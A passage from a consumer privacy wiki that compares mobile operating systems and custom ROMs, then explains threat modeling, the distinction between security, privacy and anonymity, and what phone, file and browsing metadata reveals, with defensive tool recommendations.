🟢 Play Services sandboxed; full store access + sideload | 🟢 Enforced + hardened | 🟢 Private Spaces + Work profiles + User Accounts | 🟡 Pixel only (+ Motorola announced) | 🟢 Memory hardening, duress passwords, auto-reboot | 🔴 No OS-level E2EE; app-level only | | **CalyxOS** | 🟢 Minimal, auditable | 🟢 Open source | 🟢 Good controls | 🟡 microG (locked-down spoofing, system-integrated) | 🟢 Enforced | 🟢 Work profiles + User Accounts | 🟡 Pixel, Fairphone + some others | 🟡 Minimal additional hardening | 🔴 No OS-level E2EE; app-level only | | **/e/OS, LineageOS, iodéOS** | 🟢 Minimal, auditable | 🟢 Open source | 🟢 Good controls | 🟡 Varies, typically microG or no compatibility layer | 🟡 Varies by ROM + device | 🟢 Work profiles + User Accounts | 🟢 Widest range incl. older & non-Pixel | 🟡 Minimal additional hardening, potentially weaker | 🔴 No OS-level E2EE; app-level only | #### What Your OS Enables Downstream Your operating system determines a lot more than just telemetry; it shapes everything your device is capable of doing. The clearest way to see this is that each platform unlocks things the other simply can't. Android opens up capabilities that don't exist on iOS: an official, well-maintained Tor Browser release, the [F-Droid](https://f-droid.org) open-source app ecosystem, browsers with extensions, and work profiles that create completely isolated environments for compartmentalization. iOS, in turn, offers things Android has no OS-level equivalent for: iCloud with Advanced Data Protection extends end-to-end encryption across backups, photos, and notes in a way no Android ecosystem matches. Lockdown Mode also offers top-tier security with a single toggle. These downstream differences can often have more practical privacy impacts for individuals than the baseline spec sheets imply, because they decide which protections are even available to you in the first place. The interoperability effect is also real: if your family uses iMessage and you switch to Android, their conversations with you may drop back to SMS, reducing privacy for everyone in those threads. Privacy is partly a social system. The platform you choose affects which protocols you can realistically maintain with the people in your life. The right approach is almost always holistic and balances technical competency, with practical safety, with interoperability across people in your life. --- ## 🎯 Why It Matters [A 2021 study by Trinity College Dublin](https://www.tcd.ie/news%5Fevents/articles/new-study-raises-fresh-privacy-concerns-about-apple-and-google-mobile-phones/) measured what freshly reset, account-free smartphones actually transmit at baseline. They found that both iOS and Android sent data to Apple and Google before any account was signed in, any app was opened, or any analytics sharing was enabled. Neither company disputed the transmission. The researcher's conclusion: "Currently there are few, if any, realistic options for preventing this data sharing" on stock iOS or Android. This is the starting position. Before you install any app, before you make any choices about your browser or search engine or messaging app, your device is already maintaining an ongoing data relationship with the company that built the OS. Every app you install, every permission you grant, every network connection your apps make happens on top of this baseline. The OS matters because it determines the terms under which everything else operates. A VPN tunnels your traffic, but the OS still knows what domains your apps connect to. An encrypted messaging app secures your communications, but the OS controls what system-level access that app has. A privacy-respecting browser limits fingerprinting, but if the OS is restricting your browser engine, browser-level protections will be restricted. For most everyday people, this doesn't mean an immediate OS change is required. The protections covered in earlier articles like encrypted messaging, DNS, permission hygiene, and aliasing provide real improvements regardless of OS. Maximizing what you can do on your current device is generally a better first step, and once you've implemented reasonable protections you can upgrade your OS once you're ready. For higher-stakes situations, the OS choice becomes more important. Citizen Lab reported that iOS Lockdown Mode blocked [BLASTPASS](https://citizenlab.ca/blastpass-nso-group-iphone-zero-click-zero-day-exploit-captured-in-the-wild/), a zero-click NSO Group exploit, and [alerted against PWNYOURHOME](https://citizenlab.ca/research/nso-groups-pegasus-spyware-returns-in-2022/), another Pegasus attack vector—with no confirmed bypasses post-activation. For people facing government-grade spyware as a realistic threat (journalists, activists, lawyers on sensitive cases), iOS Lockdown Mode has a documented track record against real attacks with zero signs of ever being bypassed. Similarly, for people whose priority is minimizing tracking infrastructure, reducing Google's footprint, and gaining compartmentalization capabilities, GrapheneOS on a supported Pixel is another solid path. The right mobile OS depends entirely on what you're protecting against and what you're willing to trade in compatibility and convenience. The Threat Modeling article gives you the framework for working out which answer fits your situation. --- ## 💡 Common Misconceptions ### "Switching to a custom ROM makes you private." It doesn't. It removes a category of OS-level data collection and gives you a cleaner foundation to build on. But you can still install invasive social media apps on a custom ROM. You can still grant invasive permissions to any app you install. You can install malware. The privacy outcomes you get from the OS swap are the ceiling, not the floor. What actually happens on the device still depends on what you install, how you configure it, and what accounts you're logged into. ### "Keeping verified boot is always worth more than getting software updates." This is one of the most common questions I get about older phones, and it's a genuinely tough spot to be in without an obvious win. Three things that are important to clear up: - **Software updates** are the OS-layer security patches (Android's updates, framework and kernel fixes). A custom ROM like [LineageOS](https://lineageos.org) can keep these current long after the manufacturer quits, which is the main reason to install one on an abandoned device. - **Firmware updates** are the lower-level pieces (bootloader, baseband/modem, vendor blobs). These are rarely managed by a custom ROM, so they are normally frozen once the manufacturer stops pushing updates. That exposure is identical whether you stay on stock or switch, so it shouldn't drive your decision either way. - **Verified boot** is the chain of trust ensuring your device only boots untampered, signed software. Its core job is preventing *persistent* malware, the nasty stuff that survives reboots. Installing most custom ROMs requires unlocking the bootloader, which breaks it. But some allow you to re-lock your bootloader to still maintain verified boot. This question comes out of the reality that ROMs prioritizing older devices *tend* to drop the verified boot requirement. So the question really boils down to which risk you'd rather reduce: patches lower the odds of being compromised *in the first place*, while verified boot limits the damage if you are (stopping a compromise from becoming permanent). I'm not going to claim to have the 'right' answer for everyone, but I do believe for most users with proper hygiene, they are more likely to get benefits from a custom ROM that includes real privacy benefits over staying on a frozen, outdated OS from their manufacturer...as long as they're aware of the risks. If your threat model puts a premium on tamper-resistance and boot integrity, the clean answer is a still-supported device, or GrapheneOS/CalyxOS on a Pixel where you don't have to choose at all. ### "The OS swap is the first move you should make." This is a misconception that I think needs some healthy pushback. I'm a strong believer that in practice, switching mobile operating systems is one of the *later* changes most people benefit from, not one of the earlier ones. A password manager, two-factor authentication, encrypted messaging, and aliases all deliver meaningful protection on your current device today, without changing platforms. They also have a second-order effect: every one of them makes a future OS migration easier. If everyone you message is on Signal already, switching to GrapheneOS or back to iOS doesn't break your social fabric. If your notes are in a cross-platform tool, switching doesn't strand your data. Doing the upstream work first makes the downstream choice cleaner when you get to it. Of course there's no 'right' order, but I don't think people need to be on a perfect operating system to still make a majority of gains on their journey. ### "Mobile OS choice is a pure technical decision." It isn't always the case, though I wish it was this simple! Your OS choice shapes what you can do downstream. If you switch from iMessage to a platform where iMessage doesn't exist, the conversations with the people in your life often drop down to SMS, reducing privacy for everyone in those threads. But if you switch from iOS to Android, you might gain work profiles, multiple Signal instances, and per-app VPN control—real capabilities iOS doesn't offer. These are just a few examples where the right OS can mean completely different things for different people. While specs can be important, I always encourage a holistic view of your entire tech stack and how an OS fits into it. For many people, this discussion can be limited simply by which phone you're able to afford and needing to pick the best OS for that cost point. --- ## 🗣️ Henry's Take I notice a lot of people tend to reach for OS swaps on both desktop and mobile first because it feels like the biggest move, and feeling like the biggest move feels like it's more impactful. But my experience is that the password manager, the second factor, the encrypted messenger, the aliases, and the encrypted storage upstream of the OS are what move the needle on day-one privacy outcomes. Once those are in place, *then* the OS migration becomes the natural next step rather than the leap that has to carry everything. These are also far more accessible starting points for everyday users. I use a lot of devices across both ecosystems for different reasons. Professionally, the Apple ecosystem does something remarkable: it ships [Lockdown Mode](https://support.apple.com/en-us/105120) as a literal toggle that meaningfully hardens the device against government-grade spyware, and [Advanced Data Protection](https://support.apple.com/en-us/102651) extends end-to-end encryption across iCloud to a degree that no Android platform currently matches at the OS level. The only things not E2EE with ADP are Mail, Contacts and Calendar—which Proton and Tuta are perfect swap-ins for. On Android, custom ROMs are the right open-source choice in 2026\. GrapheneOS in particular delivers serious hardening, per-app network controls, MAC randomization, memory hardening, duress passwords, auto-reboot, all on top of a sandboxed Google Play model. It's a strong option for users whose threat model values that kind of control and who are willing to accept Pixel hardware as the cost of entry. I also think that CalyxOS does a great job at maintaining base security, and introducing nice privacy benefits with larger device compatibility (I'm particularly a fan of the Fairphone!). Ultimately, custom ROMs are where you're going to find the highest degree of transparency for mobile devices in 2026. I don't think I could write this section without mentioning the direction Android seems to be moving. Google's [pressure on sideloading](https://developer.android.com/developer-verification) (with [developer verification required even for sideloaded apps](https://9to5google.com/2025/08/25/android-apps-developer-verification/) rolling out from 2026), the long-running [migration of capabilities out of AOSP and into proprietary Play Services](https://arstechnica.com/gadgets/2018/07/googles-iron-grip-on-android-controlling-open-source-by-any-means-necessary/), [development moving fully behind closed doors](https://www.androidauthority.com/google-android-development-aosp-3538503/), and [source releases slowing to twice a year](https://lwn.net/Articles/1053061/)...these are all making the custom ROM path structurally harder to sustain. So my hope is that mobile Linux options mature enough over the next few years to provide a genuinely independent foundation. Right now, custom ROMs are still the answer. But I am concerned over the real damage that Google can cause this open ecosystem given it still has a lot of influence over it. When a regular person new to this asks me for a phone recommendation, I normally recommend a Pixel running stock Android with deliberate privacy tools, or an iPhone with ADP enabled and a small set of privacy-respecting apps installed. Either can be a meaningfully strong baseline. The iPhone always has Lockdown Mode waiting for them, and the Pixel always has a custom ROM waiting for them. --- ## ✅ Henry's Picks [**iPhone**](https://www.apple.com/iphone/) **with** [**Lockdown Mode**](https://support.apple.com/en-us/105120) **and** [**Advanced Data Protection**](https://support.apple.com/en-us/102651) **enabled**: the strongest practical baseline available for someone who isn't ready to leave the mainstream app and contact ecosystem. ADP brings end-to-end encryption to most of iCloud. Lockdown Mode has a real track record against government-grade spyware. Both ship in standard iOS and cost nothing extra. [**Pixel**](https://store.google.com/category/phones) **running stock Android**: the cleanest baseline Android, fewer manufacturer and carrier layers than other devices, and the hardware platform that supports nearly every privacy-focused custom ROM if you decide to migrate later. Supports Android Advanced Protection for higher security, and has a far more open ecosystem than what iOS currently provides. [**GrapheneOS**](https://grapheneos.org) **on a supported Pixel**: the strongest privacy-and-security Android option. Sandboxed Play Services keep compatibility broad without giving Google system-level access. Per-app network controls, MAC randomization, memory hardening, duress passwords. Pixel-only historically; the [Motorola partnership](https://9to5google.com/2026/03/01/motorola-confirms-grapheneos-partnership-for-a-future-smartphone-porting-features/) announced in early 2026 may expand hardware support over time. [**/e/OS**](https://e.foundation/e-os/) **or** [**LineageOS**](https://lineageos.org): for users on non-Pixel hardware where GrapheneOS isn't an option, or for extending the useful life of older devices that no longer get manufacturer updates. Meaningful improvements over manufacturer stock Android, with the tradeoff that verified boot and additional hardening vary by device. CalyxOS I'm still watching to see them resume regular updates. [**Plexus**](https://plexus.techlore.tech): my open-source community project for checking whether the apps you depend on actually work on a degoogled Android setup. Worth checking *before* you migrate. See the broader recommendation set at [Techlore's SPA Tools](https://tools.techlore.tech/). ### Threat Modeling: How to Know What You Actually Need to Protect URL: https://techlore.tech/threat-modeling-how-to-know-what-you-actually-need-to-protect/ Last updated: 2026-07-19T02:06:45.000Z ## 📖 The Basics ### What It Is Threat modeling is a structured way of assessing your personal situation: what you have that's worth protecting, who might want it, and what the realistic consequences are if they get it. It's the difference between applying someone else's checklist and actually understanding your own situation. A threat model is a way of thinking that shapes every tool choice and habit you develop. Once you have one, even a rough one, you stop asking "is this app safe?" and start asking the right question: *'safe enough for what I'm trying to do, against who I'm worried about?'* ### How It Works The Electronic Frontier Foundation's [Surveillance Self-Defense guide](https://ssd.eff.org/) breaks threat modeling into five questions. Together they take you from vague concerns to a clear, calibrated picture of what you need. #### 1\. What do you want to protect? Start with your assets, the specific things that would cause real harm if exposed. Your physical location. The contents of your messages. Financial account access. Health information. Work documents. The contacts and sources you communicate with. It's important to be concrete. "Everything" isn't a useful answer, and treating everything as equally sensitive means you'll burn out trying to protect things that don't *really* matter to you. #### 2\. Who do you want to protect it from? People are quite binary about this, they often assume they're being targeted by nation-states (most aren't) or assume nobody cares about their data at all (they're **definitely** wrong about that). Your actual adversaries might be commercial data brokers harvesting behavioral data at scale. They might be opportunistic criminals looking for easy targets. They could be a specific motivated individual: an abusive ex, a stalker, a hostile employer. In rarer cases, for journalists and activists, they're state-level actors with real technical resources. Each of these adversaries requires a completely different response. #### 3\. How likely is it that you'll need to protect it? This question is really asking for honest risk assessment. Not reassurance, but also not paranoia. Most people aren't being actively targeted by sophisticated surveillance operations. Recognizing that is accurate calibration, not naivety. At the same time, someone who attends political protests or is documenting workplace misconduct should answer this very differently than someone whose main concern is spam. #### 4\. How bad are the consequences if you fail? A leaked embarrassing photo is not the same as a disclosed location to someone who wants to harm you. A breached email account is not the same as an exposed source network for a journalist. High-risk scenarios justify real inconvenience. Lower-risk scenarios don't require the same investment. Being honest here keeps you from over-protecting things that don't matter, while actually protecting the things that do. #### 5\. How much effort are you willing to sustain? A tool that offers better protection in theory but gets abandoned in two weeks offers zero protection. Sustainable moderate security beats theoretical maximum security you don't actually use. And the people you communicate with have to be willing to use your tools too, or they're useless. ### Understanding Common Archetypes **Answering those five questions can help you craft a threat model.** Most people fall roughly into one of these profiles, or archetypes. These are generic illustrations not meant to be taken too literally, it's just to make the concept of a threat model more tangible. If you'd rather work through the five questions interactively and get placed among these archetypes automatically, the [SPA Quiz](https://quiz.techlore.tech) is the fastest path to a personalized starting point. #### The Everyday User Primarily worried about data brokers, advertising surveillance, and account compromise. Their adversaries are commercial collectors and opportunistic criminals. What they normally need: a password manager, two-factor authentication on important accounts, a privacy-respecting browser and search engine, and better messaging habits with friends and family. That covers many meaningful improvements for the majority of people. #### The Working Professional Has work accounts, company devices, and professional responsibilities that raise the stakes beyond the everyday user baseline. Their adversaries are largely the same, but a professional email compromise or device breach now carries consequences beyond just personal data. What they normally need is everything the everyday user has, plus deliberate separation between work and personal devices and accounts, and stronger habits around passwords and two-factor authentication specifically for work credentials. #### The Family Guardian Managing digital safety not just for themselves, but for a household that includes people with different skill levels like children or less tech-savvy family members. Their adversaries include data brokers, predatory platforms harvesting family data, and account compromise rippling across shared devices. What they normally need is everything the everyday user has, extended to the whole household: a family-friendly password manager, parental controls on shared devices, age-appropriate messaging tools, and the patience to help others build habits they'll actually stick with. #### The Professional Handling Sensitive Data A lawyer, therapist, accountant, or executive will need everything above, plus safe channels for client communications and careful separation of work and personal devices. Sophisticated surveillance probably isn't their concern; inadvertent leaks and credential attacks are. A public-facing role also means extra attention to security, since higher visibility creates more incentive for targeting. #### The Journalist or Activist May face adversaries with genuine technical resources, potentially including state actors. They need strong operational security, end-to-end encrypted communications with strong metadata protection, anonymous browsing capability, and sustained discipline across every device they use. The more advanced sections of this wiki become directly relevant here. #### The Person Leaving a Dangerous Situation Needs to protect their location and communications from a specific, highly motivated individual who may already have access to their devices and accounts. Checking for monitoring software, securing accounts, managing location metadata carefully, and understanding what data is stored where are immediate priorities. #### The Complicated, Dynamic Reality Few people fit cleanly into a single archetype. Most are everyday users who are also working professionals, or family guardians with some sensitive data to protect. Blends are the norm, which is why the quiz produces hybrid scores rather than a single label. Threat models also change. A new job, a relationship shift, a more public profile—any of these can change what matters and who's looking. Revisiting your model periodically and being honest when your situation changes is part of the practice. --- ## 🎯 Why It Matters Two people download the same app, a family location-sharing tool: the kind that lets parents see where their kids are, lets couples share their commute, lets friends coordinate meetups. These can be convenient and can even keep people safe. For one of those people, it stays that way—they get injured on a run and their partner was able to find them quickly. But for the other, a woman who has quietly left an abusive relationship and moved to a new address, that app is still running on a device her ex has access to. The same feature designed to keep families safe is now telling someone potentially dangerous exactly where she is. Same app. Same decision to install it, but completely different stakes. This is why "is this app safe?" is almost never the right question. Every tool exists in context of something else. The right question is always: *'safe enough for my situation, against the specific risks I actually face?'* Without a threat model, you're really just guessing. There are consequences of guessing wrong. Applying a journalist's security setup to an everyday situation creates exhausting overhead that leads to abandoning all of it. And if you apply an everyday user's setup to a high-risk situation it can leave dangerous gaps that look like protection. This is why developing a sense for a threat model is one of the most important parts of the journey that should never be skipped. One of the most underrated benefits of establishing a good threat model is it tells you when you've done enough (for now). Privacy advice has no natural stopping point, you can always add another layer, switch to a more obscure tool, restrict another service, and a threat model can help give you a healthy stopping point, at least until you re-assess. --- ## 💡 Common Misconceptions ### "There's a correct threat-modeling framework I need to find." There normally isn't. The EFF's five questions, STRIDE, LINDDUN, and most other frameworks are useful for working through your situation, but it's rare for one of them to function as a definitive answer. Generally, the point is to develop a way of thinking that becomes second nature, not to find the "right form" to fill in. ### "Threat modeling means picking better tools." Tools come last. Thirty minutes of honest brainstorming about what you actually have at stake and who could realistically come after it will shape your tool choices far more than starting with "should I switch to Signal" or "do I need Tor." Pick the problem first, and the right tools become obvious once you do. ### "If I'm not a journalist or activist, I don't need a threat model." Everyone has a threat model whether they've articulated it or not. The everyday user has data brokers, credential thieves, and platform surveillance to think about. Those are real adversaries, just very different from a state actor. Saying "this doesn't apply to me" is actually itself part of a threat model—just likely an unexamined one. ### "Once I have a threat model, I'm done." Threat models drift. A new job, a public profile, a relationship change, a move to a different country...any of these can change what matters and who's looking. Revisiting your model on something like an annual cadence (or any time your life changes) is part of the practice. --- ## 🗣️ Henry's Take Threat modeling is one of those concepts that gets cited constantly but executed rarely. If two people actually share the same threat model, the difference between most of their tool choices is likely pretty small. When I'm lurking in communities online and I read polarized discussions about whether a tool is "good" or "safe"—it's *almost always* a threat model mismatch posing as a tool debate. One of the most dangerous patterns I see is people with higher threat models imposing their requirements on others who genuinely don't need the same degree of protection. The frameworks in this article are training wheels. You use them while building the muscle, and over time you stop needing the explicit checklist and start making calls automatically. That's the long-term goal: not a finished threat-model artifact in Obsidian, but a way of thinking that's internalized. Once you get there, most of the debates the community loves to have over tools become largely noise. The single highest-leverage thing you can do is spend thirty minutes brainstorming honest answers to the five questions before touching any tool. People who do this once read every privacy recommendation differently from then on. --- ## ✅ Henry's Picks Threat modeling is one of the rare topics where the "tool" is a structured exercise, not a piece of software. - [**SPA Quiz**](https://quiz.techlore.tech): A short, situation-based assessment that translates "what's my life like" into actionable advice to help craft your first threat model. The fastest path to a personalized starting point. - [**EFF Surveillance Self-Defense—Your Security Plan**](https://ssd.eff.org/): The five-question framework explained above, in EFF's own words. Free, well-written, and as practical as any resource on the internet for self-assessment. - **A blank document and thirty minutes.** Brainstorm honest answers to the five questions. Doing it once changes how you read every privacy recommendation from then on. ### Security vs. Privacy vs. Anonymity: What's the Difference? URL: https://techlore.tech/security-vs-privacy-vs-anonymity-whats-the-difference/ Last updated: 2026-07-19T02:05:01.000Z ## 📖 The Basics ### What It Is Security, privacy, and anonymity are three separate properties of digital protection. While they often work together, and you *usually* want elements of all three—they describe unique goals. *Security* is about keeping unauthorized parties away from your data. *Privacy* is about controlling who *can* access your information and under what conditions. *Anonymity* is about severing the link between your actions and your identity entirely. ### How It Works I think an example is the best way to illustrate the unique properties of security, privacy, and anonymity. Let's say you walk into a pharmacy and buy something sensitive like HIV medication, a pregnancy test, or addiction treatment medications. (Fill this in with anything you'd rather not broadcast to the world.) There are three unique properties you need to consider: #### Security Security asks: *can the wrong people access this data?* A secure pharmacy has encrypted payment systems, access controls on its databases, and protection against breaches. That's a great start, but notice what security doesn't address: it says nothing about what the *authorized* parties do with your information once they have it. In other words, can the pharmacy and its third-parties be trusted with the information? #### Privacy Privacy asks: *who knows what about me, and did I consent to that?* Does the pharmacy sell purchase data to third parties? Can you opt out of their loyalty program? Could you pay with an alias to limit what gets recorded? Privacy is about controlling the conditions of access, it's the ability to confidently know exactly what the pharmacy does and doesn't know about you—regardless of their security practices. #### Anonymity Anonymity asks: *can this be traced back to me at all?* This goes further than privacy. It means making the purchase in a way where your real identity is never attached to the transaction, it's completely trustless. Paying cash, forgoing insurance, perhaps obscuring other identifying characteristics. The action is real. The connection to you isn't. This removes the need to trust the pharmacy at all. #### Choosing Privacy Tools The relationship between each property plays out constantly when choosing tools. Let's take a look at choosing a messaging app. [Signal](https://signal.org) is a common recommendation because messages are end-to-end encrypted and they retain almost nothing about users. But Signal requires a phone number to register, which means your account is tied to an identity, even if you hide it with a username. When we zoom out, we can see that Signal emphasizes strong security and privacy, but not necessarily anonymity. Other messengers like [Session](https://getsession.org) or [SimpleX](https://simplex.chat) take a different approach with no phone numbers and no accounts linked to your name, because they're optimizing more heavily for anonymity. Neither approach is universally better, in fact many consider Session a less secure messenger than Signal. The reality is they all reflect different priorities for different threat models. ## 🎯 Why It Matters Conflating these three concepts is one of the most common mistakes people make when evaluating digital tools. Someone can use full-disk encryption (strong security) while still having everything they do logged and sold by every app on their device (poor privacy). Someone can use a privacy-respecting messaging app (good privacy) and still be identifiable by their phone number or IP address (limited anonymity). Someone can achieve near-complete anonymity with Tor, cash, no accounts, but still have their data stolen if their device is compromised (weak security). Getting the diagnosis wrong means applying the wrong solution. This is exactly why the [SPA Quiz](https://quiz.techlore.tech) doesn't just ask what tools you want—it asks what you're trying to protect and why. Your answers shape whether you need to focus on S, P, A, or some combination of all three. Understanding which property you're actually trying to achieve and which tools actually deliver it is the foundation everything else builds on. Going back to our messenger example: for some of you, Signal will be the perfect solution as you don't need absolute anonymity in a daily messenger. For those with higher threat models, Signal could come with sacrifices that are unacceptable for your concerns. --- ## 💡 Common Misconceptions ### "Security and privacy are the same thing." They overlap, but they answer different questions. Security is about keeping the wrong people out. Privacy is about controlling what the *authorized* people get to do with your information once they have it. A hospital can have flawless cybersecurity and still sell your prescription history to advertisers. ### "Strong security automatically gives me privacy and anonymity." The 2020 [Ledger data breach](https://www.coindesk.com/markets/2020/07/29/crypto-wallet-maker-ledger-loses-1m-email-addresses-in-data-theft) is a clean example of why this isn't true. Ledger sells cryptocurrency hardware wallets designed to offer serious air-gapped security. But when the company's customer database was breached, roughly 1 million customer email addresses were exposed—and for a smaller subset of customers, names, home addresses, and phone numbers were posted publicly too. This drew a target on the back of everyone who owned enough crypto to bother buying a hardware wallet. The device's security held. The privacy of *who owned one* didn't, and once identities were tied to "this person holds crypto," anonymity was gone too. Three properties that all depend on each other. ### "Anonymity means doing something secret or suspicious." Anonymity is just unlinking your identity from an action. The action itself can be completely ordinary like buying medication, reading a news article, or sending money to a relative. There are countless reasons someone might want a normal activity uncoupled from their name. Does anyone ask questions when their library gets an anonymous donor? Obscurity can also matter: using an old phone you already own for a sensitive purpose is more anonymous than buying a dedicated "anonymous" device, because the old phone doesn't signal anything to anyone. Blending in is often more effective than standing out. ### "I only need to focus on one of these." Most people gravitate toward one of the three: security feels concrete, privacy feels powerful, anonymity feels niche. The honest answer is that the mix you need depends on what you're trying to protect and from whom. Some people genuinely only need one pillar, but most need elements of all three, just in different proportions. ### "True anonymity online is impossible, so why bother?" Total, permanent, against-every-adversary anonymity is genuinely hard...maybe impossible. But anonymity isn't binary. Most people benefit from *partial* anonymity against *specific* parties they care about. Your search engine not knowing it's you, your messaging app not requiring a phone number, your purchases not being linked to a marketing profile. The right question is almost always "anonymous from whom, in which context, for what?" --- ## 🗣️ Henry's Take Almost every mistake I see in how people approach digital protection traces back to confusing these three pillars. Someone hardens their device with full-disk encryption and a password manager, then files their taxes through an app that sells their financial profile to data brokers. Or maybe a journalist in a hostile environment uses Signal religiously but registers it with their real phone number and assumes they're untraceable. The Ledger breach I covered earlier is a real, tangible example: owners of one of the most secure devices in the cryptocurrency world had their names, home addresses, and "I own crypto" status leaked to the open internet. The device security held. The privacy and anonymity around *purchasing* the device didn't. [Cupcake](https://docs.cakewallet.com/cupcake), which instead turns an old phone into your hardware wallet, makes the trade-off concrete: slightly less dedicated security, but better privacy through obscurity, with no "crypto device" purchase trail. Different approaches with different tradeoffs. I think security tends to be the easiest to grasp since most people instinctively understand they don't want their bank accounts broken into. Privacy is harder, because it requires deciding which authorized parties you actually trust with which information. Anonymity is hardest, because it involves designing your behavior so an action and an identity never get connected in the first place. None of the three is inherently more important than the others; what matters is which mix matches your life right now. Pick the pillar with the biggest gap, start there, and reflect again in 3-6 months. The threat landscape changes, and so will you. --- ## ✅ Henry's Picks This article isn't designed to recommend a specific tool, it recommends a *process* for figuring out which tools you actually need. - [**SPA Quiz**](https://quiz.techlore.tech): A short assessment that maps your situation to the pillars you should focus on. The fastest way to get a personalized starting point. - **Threat Modeling**: The wiki article on how to translate "what worries me" into "what I should actually do about it." - [**SPA Tools**](https://tools.techlore.tech/): Our curated shortlist of tools across every category. Once you know which pillar you're short on, SPA Tools is where to find the tools to help fix it. If you'd rather work through this in long-form structured order, [Go Incognito](https://techlore.tech/go-incognito-course/) covers all three pillars from foundations to advanced topics. ### What Is Metadata and What Does It Reveal About You? URL: https://techlore.tech/what-is-metadata-and-what-does-it-reveal-about-you/ Last updated: 2026-07-19T02:03:57.000Z ## 📖 The Basics ### What It Is Metadata is data about data, it's the information that surrounds your content without being the content itself. When you make a phone call, send a message, take a photo, or visit a website, you generate a surrounding layer of data outside of the content itself. It doesn't include what you said to your doctor, but it includes that you called them, when, for how long, and from where. ### How It Works Metadata shows up in a few main places in everyday digital life, and each one has a different profile of what it reveals. #### Communication metadata Every phone call generates a record: who called whom, when, how long the call lasted, and which cell towers the phone connected through during the call. These pieces of data can locate both parties with significant precision. Every email carries a header containing the sender, recipient, subject line, timestamps, and every mail server the message passed through on its way to you. Messaging apps, depending on how they're built, may log who you talk to, how often, and when, even if the message contents are encrypted. Here's how revealing that can be in practice: You call a suicide prevention hotline at 3am. The call lasts 42 minutes. A week later you call your doctor, then a pharmacy. No one hears a word you said. But the metadata record of those calls tells a story that's difficult to misread. [Research has demonstrated](https://www.pnas.org/doi/10.1073/pnas.1508081113) that phone metadata alone is sufficient to infer medical conditions, financial crises, relationship breakdowns, and legal situations, all without accessing the content of a single call. #### File metadata This travels with files every time you share them. Photos taken on a smartphone typically contain EXIF data (*Exchangeable Image File Format*) embedded directly in the image file. This includes things like GPS coordinates of where the photo was taken, the exact time and date, the device model, and camera settings. Send that photo directly to someone via email or an unstripped messaging app, and that location data goes with it. Documents can carry their own metadata like author name, creation date, modification history, software used, and sometimes tracked changes or comments that the sender thought were hidden. These have caused real embarrassment and legal exposure when documents were shared without being cleaned. #### Browsing and network metadata This is collected continuously and largely invisibly. Your ISP can see every domain you visit. Your DNS provider (the service that translates domain names into IP addresses) sees a similar picture. Website analytics scripts record how long you stay on a page, what you click, where your cursor moves, and which page you came from. This layer of behavioral metadata builds a detailed profile of your interests, concerns, and habits over time. #### How to view and strip file metadata For photos, the simplest trick is the one I describe in my take below: send the image to yourself in [Signal](https://signal.org)'s Note-to-Self chat, then save it back out. Signal strips EXIF on the way through. No extra tool needed. For batch processing, [ExifTool](https://exiftool.org) is a popular command-line tool; the [ExifCleaner](https://exifcleaner.com) GUI wraps it for non-terminal users. On iOS, sharing a photo with the "Options → Location: Off" toggle removes GPS before sending, which Lockdown enables by default. On Android, [Scrambled Exif](https://f-droid.org/en/packages/com.jarsilio.android.scrambledeggsif/) is available on F-Droid. For documents, Microsoft Word and Google Docs both expose an "inspect document" or "version history" pane that surfaces hidden author/edit data. The cleanest way to publish a "no metadata" PDF is to print to PDF rather than exporting directly. Metadata awareness doesn't require overhauling your entire digital life, education and finding the right tools are typically enough to mitigate a majority of concerns. --- ## 🎯 Why It Matters In 2014, former NSA and CIA Director Michael Hayden [said it plainly during a public debate on surveillance at Johns Hopkins University](https://www.justsecurity.org/10318/video-clip-director-nsa-cia-we-kill-people-based-metadata/): *"We kill people based on metadata."* The NSA's bulk metadata collection programs exposed by Edward Snowden in 2013 were built on this logic: gather metadata at scale, analyze the patterns, and surface associations. For most people, the stakes are less dramatic but no less real. Consider what your metadata actually contains: - Your phone records over any given month reveal your doctor, your therapist, your lawyer, your employer, your family, your friends, your on-and-off relationships, and anyone you've called during a crisis. The content of those calls doesn't need to exist anywhere. The record of *them happening* is all someone needs. - Your photo library, if unstripped of EXIF data, contains a GPS-tagged record of everywhere you've physically been. - Your browser history, visible to your ISP and DNS provider, shows every topic you've researched. The most important practical implication: **end-to-end encryption and metadata protection are not the same thing.** An app can truthfully claim that no one can read your message because it's encrypted, while still logging, retaining, or exposing significant metadata about who you communicate with and when. Messengers like [Signal](https://signal.org) are specifically designed to minimize metadata. Their architecture is built around retaining as little as possible about who communicates with whom. [When subpoenaed, they have been able to produce only basic account creation timestamps](https://signal.org/bigbrother/cd-california-grand-jury/), because that is genuinely all they hold. Other messengers like WhatsApp are unable to make the same guarantees, other than the fact they implement encryption. --- ## 💡 Common Misconceptions ### "End-to-end encryption protects everything about my conversation." It protects content. But metadata includes who you talked to, when, for how long, from where, etc. A platform can be fully end-to-end encrypted and still record and retain detailed metadata about every conversation. WhatsApp is encrypted, but Meta still sees who you message, when, and how often. Compare that to something like Signal which is encrypted *and* architected to minimize metadata. ### "Metadata is harmless, it's just timestamps and headers." A [Stanford research project](https://www.pnas.org/doi/10.1073/pnas.1508081113) reconstructed medical conditions, financial crises, and relationship breakdowns from phone metadata alone. No call content, just patterns of who, when, and how long. Former NSA and CIA Director Michael Hayden publicly stated that the agency makes lethal targeting decisions [based on metadata](https://www.justsecurity.org/10318/video-clip-director-nsa-cia-we-kill-people-based-metadata/). Metadata reveals more than most people assume. ### "Only communications carry metadata." File metadata travels with files. Photos taken on a phone usually have GPS coordinates embedded in them. PDFs and Word documents carry author names, edit history, and the software that made them. Sharing one untouched photo can disclose your home address. Sharing a "redacted" PDF can quietly disclose the original text underneath. The metadata travels with the file unless something explicitly strips it. ### "If I care about metadata I have to overhaul everything I use." A lot of it is reducible with everyday choices. Switching to a messenger architected to minimize metadata cuts what your provider retains. Using encrypted DNS and a VPN reshuffles what your ISP can see. Stripping a photo's EXIF data before forwarding it takes one tap. Metadata awareness is a habit, not a full lifestyle overhaul. --- ## 🗣️ Henry's Take The single line that I'd highlight: **end-to-end encryption protects content, not metadata.** A platform can be fully encrypted and still know precisely who you talk to, when, how often, and for how long—and that contextual record can be just as revealing as the messages themselves. Most people stop thinking about privacy the moment they hear "end-to-end encrypted." And we need to close this gap. Encryption is the floor of digital security in 2026, even RCS is getting E2EE...the real gap that needs to be closed is the metadata surrounding the conversations. I think for most people: Signal earns its reputation specifically because it's designed not to have metadata in the first place. When subpoenaed, [Signal can produce only account-creation timestamps](https://signal.org/bigbrother) because that's all they know. This makes Signal a very approachable yet powerful tool for many threat models. Since I opt for Signal for most of my contacts, it also makes it easy for me to use Signal as my go-to metadata tool. When you send a photo through Signal, including to yourself via the Note-to-Self 